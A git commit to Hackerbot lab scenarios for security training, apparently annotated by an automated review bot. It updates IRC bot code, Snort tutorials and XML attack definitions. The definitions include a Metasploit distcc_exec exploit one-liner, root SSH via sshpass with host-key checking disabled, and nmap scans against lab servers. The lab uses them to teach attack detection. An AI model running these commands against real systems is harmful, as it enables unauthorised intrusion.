lab updates

This commit is contained in:
Z. Cliffe Schreuders
2017-10-30 22:31:00 +00:00
parent cd3c21b514
commit 8817a3165b
6 changed files with 40 additions and 189 deletions


@@ -62,8 +62,11 @@
<!--<get_shell>bash</get_shell>-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<greeting>Today you are about to be under attack.</greeting>
<show_attack_numbers />
<greeting>You are about to be attacked!</greeting>
<!--Must provide alternatives for each message-->
<say_ready>When you are ready, simply say 'ready'.</say_ready>
@@ -114,14 +117,14 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<!-- Two random permission attacks-->
<%
$permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb']
$permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<!-- Four random integrity attacks-->
<%
$integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb']
$integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
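Review bot: `Array#shuffle` on L25 and L32 draws from Ruby's process-global `Kernel#rand`, so which two permission attacks and which two integrity attacks a student receives is not reproducible from a scenario seed unless `srand` has been called before these templates are evaluated; if instances are meant to be regenerable (L21 describes them as randomised instances), pass the source explicitly, e.g. `].shuffle(random: Random.new(seed))`, with whatever seed the scenario exposes, if any. The randomness only selects which exercises run, so a non-cryptographic generator is otherwise fine here. The `<% %>` run also relies on `$permission_attacks`/`$integrity_attacks` being globals visible to every template in the same process, and a third include of either snippet would `pop` nil and make `File.read` raise a TypeError; a comment above L25 such as `<!-- exactly two pops follow; this array is global across templates -->` would make that limit explicit. The enclosing XML element starts outside this hunk.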


@@ -230,7 +230,7 @@ I'm about to attack your system, use Snort to detect the method of attack.
<attack>
<pre_shell>nmap -sX <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>
<shell>false</shell>
<get_shell>false</get_shell>
<post_command></post_command>
<prompt>#5 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...</prompt>
@@ -255,11 +255,10 @@ I'm about to attack your system, use Snort to detect the method of attack.
<trigger_next_attack />
</quiz>
<tutorial><%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</shell>
<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
<post_command>whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'</post_command>
<prompt>#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire. </prompt>
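Review bot: The new `get_shell` on L53 runs msfconsole's `exploit` with no exit path and the `post_command` on L54 prints only a fixed string, so nothing in the output reports whether the distcc session was actually obtained; the pre_shell attacks in this file end with `echo $?` (L41) precisely so a condition can key on 0/1. If the exploit fails, msfconsole (as far as I recall) hands unknown commands to the local shell, so the same `whoami`/`echo` lines would run on the hackerbot host, the flag would never cross the wire, and the output would look identical. Appending `; echo $?` (`... echo 'Find the flag! (in the network traffic)'; echo $?`) or, better, matching on a token only the target can produce, such as `hostname` output, gives the condition something to check. This attack's `<condition>` block lies outside the hunk, so I cannot confirm what it matches on.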


@@ -57,9 +57,11 @@ echo 'alert tcp any any -> any 80 (msg: "Web traffic detected - ASDFGH"; sid:10
service snort restart
```
==**Don't forget to reload Snort every time you add or modify a rule!**==
**From your desktop VM**, browse to a website, and confirm the rule worked to generate an alert containing "ASDFGH". Note that Hackerbot will require you to include particular text within the alerts of the rules you write.
==Don't forget to reload Snort every time you add or modify a rule!==
# TODO RANDOM
# HACKERBOT ATTACKS


@@ -63,6 +63,8 @@
<get_shell>false</get_shell>
<messages>
<show_attack_numbers />
<greeting>Your web server is going to be attacked. I have inside information that will help you to monitor your network for the attacks. If you work with me I'll provide you with some flags.</greeting>
<!--Must provide alternatives for each message-->
@@ -112,193 +114,23 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<!--<attack>-->
<!--<% $rand1 = SecureRandom.hex(2)-%>-->
<!--<pre_shell>curl -v -H 'Something-worth-noting: <%= $rand1 %>:<%= $flags.pop %>' <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<get_shell>false</get_shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#1 Monitor the network traffic using Tcpdump or Wireshark, and look out for a string starting with "<%= $rand1 %>".</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you found the flag! Moving on...</message>-->
<!--<trigger_next_attack>true</trigger_next_attack>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to talk to the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>Ok, next up...</message>-->
<!--</else_condition>-->
<!--<tutorial><%= ERB.new(File.read self.templates_path + 'tcpdump.md.erb').result(self.get_binding) %></tutorial>-->
<!--</attack>-->
<!--<attack>-->
<!--<% $rand_port = rand(65535)-%>-->
<!--<pre_shell>nmap -p <%= $rand_port %> <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<get_shell>false</get_shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#2 Monitor the network traffic, and look out for attempts to scan your webserver (<%= $web_server_ip %>). You need to identify what port the connection attempt is to.</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you found the port number.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to scan the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--&lt;!&ndash;<else_condition>&ndash;&gt;-->
<!--&lt;!&ndash;<message>:( Something was not right...</message>&ndash;&gt;-->
<!--&lt;!&ndash;</else_condition>&ndash;&gt;-->
<!--<quiz>-->
<!--<question>Now after the attack, what port number was scanned?</question>-->
<!--<answer>^<%= $rand_port %>$</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--</attack>-->
<!--&lt;!&ndash;-->
<!--# TODO MORE RANDOM HACKERBOT ATTACKS-->
<!--I'm about to attack your system, use Snort to detect the method of attack.-->
<!--&ndash;&gt;-->
<!--<attack>-->
<!--<pre_shell>nmap <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<get_shell>false</get_shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#3 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught with Snort.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to scan the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>Ok...</message>-->
<!--</else_condition>-->
<!--<quiz>-->
<!--<question>Was that a scan or an attack?</question>-->
<!--<answer>^scan$</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--<tutorial><%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %></tutorial>-->
<!--</attack>-->
<!--<attack>-->
<!--<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>-->
<!--<post_command>whoami >> out;id >> out;touch hackerbotwashere; echo $?</post_command>-->
<!--<prompt>#4 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network... This make take a while (a few minutes) please be patient.</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught that.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to contact the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>:( Something was not right...</message>-->
<!--</else_condition>-->
<!--<quiz>-->
<!--<question>What vulnerable software was exploited?</question>-->
<!--<answer>distcc</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--</attack>-->
<!--<attack>-->
<!--<pre_shell>nmap -sX <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<shell>false</shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#5 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught that.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to scan the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>Ok...</message>-->
<!--</else_condition>-->
<!--<quiz>-->
<!--<question>What kind of scan was that?</question>-->
<!--<answer>^Xmas$</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--<tutorial><%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %></tutorial>-->
<!--</attack>-->
<!--<attack>-->
<!--<shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</shell>-->
<!--<post_command>whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'</post_command>-->
<!--<prompt>#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire. </prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught that.</message>-->
<!--<trigger_next_attack />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to contact the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>:( Something was not right...</message>-->
<!--</else_condition>-->
<!--</attack>-->
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> /bin/bash</get_shell>
<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
<post_command>whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'</post_command>
<!-- topic: Rsync-->
<prompt>It's your job to set up remote backups for <%= $second_user %> (a user on your system). Use rsync to create a full (epoch) remote backup of /home/<%= $second_user %> from your desktop system to the backup_server: <%= $web_server_ip %>:/home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>.</prompt>
<prompt>#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire. </prompt>
<post_command>ls /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/<%= $files.sample %> > /dev/null; echo $?</post_command>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %></message>
<trigger_next_attack>true</trigger_next_attack>
<message>Hope you caught that.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( You didn't copy to remote ssh /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/ Remember that the trailing / changes whether you are copying directories or their contents...</message>
<output_matches>1</output_matches>
<message>:( Failed to contact the web server (<%= $web_server_ip %>)</message>
</condition>
<else_condition>
<message>:( Doesn't look like you have backed up all of <%= $second_user %>'s files to /home/<%= $main_user %>/remote-rsync-backup/<%= $second_user %>. Try SSHing to the server and look at what you have backed up there.</message>
<message>:( Something was not right...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'write_snort_rules.md.erb').result(self.get_binding) %></tutorial>
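Review bot: The `post_command` on L222 emits only a fixed message, so the `output_matches` conditions on L228 (`0`) and L237 (`1`) — assuming they are tested against the command output, as the pre_shell attacks' `echo $?` pattern implies — can only be satisfied by incidental digits in msfconsole's own chatter (session numbers, the RHOST address), and a clean success otherwise falls through to the `else_condition` on L242. The earlier form of this attack (removed L155) ended with `echo $?`; restore that, `...; echo 'Find the flag! (in the network traffic)'; echo $?`, or better match on a token only the target can print, such as `hostname` output, so that msfconsole falling back to the local shell on a failed exploit is not mistaken for success. The tutorial attached on L244 is `write_snort_rules.md.erb` while the prompt on L225 sends the student to Tcpdump/Wireshark; the removed attack used `tcpdump.md.erb` (L97), which looks like the intended one if L244 is part of this change. The `<attack>` element closes beyond the end of the hunk.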


@@ -53,9 +53,9 @@ Lets create a basic rule that detects any web traffic on port 80.
```bash
echo "alert tcp any any -> any 80 (msg: "Web traffic detected - RANDOM"; sid:1000002; rev:1;)" >> /etc/snort/rules/my.rules
systemctl restart snort
sudo service snort restart
```
Browse to a website, and confirm the rule worked to generate an alert containing RANDOM.
Browse to a website, and confirm the rule worked to generate an alert containing the text 'RANDOM'.
# TODO RANDOM


@@ -34,6 +34,9 @@ def check_output_conditions(bot_name, bots, current, lines, m)
sleep(1)
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
else
m.reply bots[bot_name]['messages']['last_attack'].sample
@@ -130,6 +133,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for the first attack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
end
@@ -148,6 +154,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -169,6 +178,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -218,6 +230,9 @@ def read_bots (irc_server_ip_address)
sleep(1)
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -369,9 +384,9 @@ def read_bots (irc_server_ip_address)
rescue # continue consuming until input blocks
end
begin
Timeout.timeout(5) do # timeout 10 sec
Timeout.timeout(15) do # timeout 10 sec
stdin.close # no more input, end the program
post_lines = stdout_err.read.chomp()
post_lines << stdout_err.read.chomp()
end
rescue Timeout::Error
Process.kill("KILL", wait_thr.pid)
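Review bot: The three-line `show_attack_numbers` check is pasted into five places across check_output_conditions and read_bots (L263-L265, L272-L274, L281-L283, L290-L292, L299-L301), each immediately followed by the same `m.reply ... ['prompt']`; a single helper keeps the header format in one place so the prompt paths cannot drift apart. The sketch below adds it, and each call site becomes `reply_attack_prompt(bots, bot_name, current, m)`. In the last hunk the comment on L310 still reads `# timeout 10 sec` after the value became 15 — `Timeout.timeout(15) do # allow slow attacks (e.g. msfconsole) to flush output before we kill them` says what the number is for. `post_lines << ...` on L313 also requires `post_lines` to be an unfrozen String created earlier in read_bots, outside this hunk; `post_lines += ...` would not depend on that. Both functions extend beyond the hunks shown.
```ruby
# Announce attack `current` to the user: the "** #N **" header only when the
# bot's messages block declares <show_attack_numbers />, then the attack's prompt.
def reply_attack_prompt(bots, bot_name, current, m)
  m.reply "** ##{current + 1} **" if bots[bot_name]['messages'].key?('show_attack_numbers')
  m.reply bots[bot_name]['attacks'][current]['prompt']
end
```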